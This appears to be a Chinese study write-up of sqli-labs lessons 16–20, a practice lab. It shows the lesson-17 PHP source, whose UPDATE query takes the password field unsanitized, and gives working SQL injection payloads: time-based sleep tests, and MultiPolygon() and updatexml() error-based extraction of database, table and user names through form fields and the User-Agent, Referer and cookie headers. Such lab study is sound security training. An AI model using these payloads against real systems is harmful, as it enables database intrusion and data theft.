目录
2.lesson-17 MultiPolygon()报错注入
1.lesson-16 布尔或时间盲注
为双引号加括号的字符型注入
判断注入类型:
uname=ain") and sleep(3)%23&passwd=fin&submit=Submit
其他参考lesson-2
2.lesson-17 MultiPolygon()报错注入
lesson-17源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value)) #判断是否为空
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc()) #当魔术引号开启时,为true,会将' "等符号转义
{
$value = stripslashes($value); #去除' "等符号的转义符
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
} #会将' "等符号转义
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
?>
uname用mysql_real_escape_string做了过滤,通过uname查询的语句是没有注入的,uname一定要存在,才能执行下面的update更新语句,所以为password位置的单引号字符型注入,为update语句注入
判断注入:
uname=admin&passwd=a'&submit=Submit
查数据库名:
uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select database())a)b))-- +&submit=Submit
查表名:
uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))-- +&submit=Submit
报错注入需要注意函数使用的版本,mysql 5.5.29所有报错注入函数可用
十大报错注入参考文章:
3.lesson-18 ua头注入
需要登录成功才能注入
登录成功后就能发现注入在user-agent,是insert语句注入
burp 抓包发送到repeater查找注入类型,ua头单引号
查用户:
ua头填入内容:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '
4.lesson-19 referer头注入
登录成功后,发现是referer头注入
burp抓包,查用户
referer处写入:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '
5.lesson-20 cookie注入
为delete注入
登录成功后发现是cookie有注入
cookie填入:
查用户
uname=admin' and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- +